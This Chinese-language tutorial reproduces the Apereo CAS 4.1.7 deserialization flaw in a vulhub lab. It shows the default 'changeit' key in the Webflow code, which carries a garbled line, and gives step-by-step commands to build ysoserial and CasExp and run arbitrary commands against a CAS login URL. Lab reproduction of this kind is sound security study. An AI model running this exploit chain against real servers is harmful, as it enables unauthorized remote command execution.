ApereoCAS4.1反序列化漏洞复现
0x01 漏洞简介
Apereo CAS是⼀款Apereo发布的集中认证服务平台,常被⽤于企业内部单点登录系统。其4.1.7版本之前存在⼀处默认密钥的问题,利⽤这个默认密钥我们可以构造恶意信息触发⽬标反序列化漏洞,进⽽执⾏任意命令。
影响版本 Apereo CAS <= 4.1.7
0x02 环境准备
使⽤vulhub复现漏洞环境。
vulhub官⽹地址:
cd vulhub/apereo-cas/4.1-rce
docker-compose up -d
0x03 漏洞检测
该漏洞存在于登录的execution参数,使⽤Burp抓包可以发现该参数值。
0x04 漏洞利⽤
漏洞原理是Webflow中使⽤了默认密钥changeit:
public class EncryptedTranscoder implements Transcoder {
private CipherBean cipherBean;
private boolean compression =true;
public EncryptedTranscoder()throws IOException {
BufferedBlockCipherBean bufferedBlockCipherBean =new BufferedBlockCipherBean();
cipher命令bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES","CBC","PKCS7"));
bufferedBlockCipherBean.ateAndPrepareKeyStore());
bufferedBlockCipherBean.setKeyAlias("aes128");
bufferedBlockCipherBean.setKeyPassword("changeit");
bufferedBlockCipherBean.setNonce(new RBGNonce());
this.setCipherBean(bufferedBlockCipherBean);
}
// ...
安装攻击利⽤⼯具
1、安装 jdk 1.8 ,配置好系统环境变量
2、安装 maven ,配置好系统环境变量
3、下载 ysoserial.jar 到 maven 安装⽬录下
链接:pan.baidu/s/1nnmBKyQ6rSIzNrmeH5yEaA
提取码:qx80
4、安装 ysoerial.jar 到本地 maven
mvn org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file -Dfile=ysoserial.jar -DgroupId=ysoserial -DartifactId=ysoserial -Dversion=0.0.6 -Dpack aging=jar -DlocalRepositoryPath=my-repo
5、下载 CasExp 项⽬源码到本地
git clone github/potats0/CasExp.git
6、打包CasExp源码为jar格式可执⾏⽂件
mvn clean package assembly:single
7、打包好的jar⽂件在 \CasExp-master\target ⽬录下
使⽤打包好的CasExp进⾏远程命令执⾏
#⼯具命令格式:
java -jar CasPoc-1.0-SNAPSHOT-jar-with-dependencies.jar your-ip:8080/cas/login "执⾏的命令"
#⼯具命令⽰例:
java -jar CasPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 192.168.126.130:8080/cas/login "uname -a"
参考⽂章
apereo.github.io/2016/04/08/commonsvulndisc/
github/vulhub/vulhub/blob/master/apereo-cas/4.1-rce/README.zh-cn.md github/potats0/CasExp/blob/master/readme.md
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论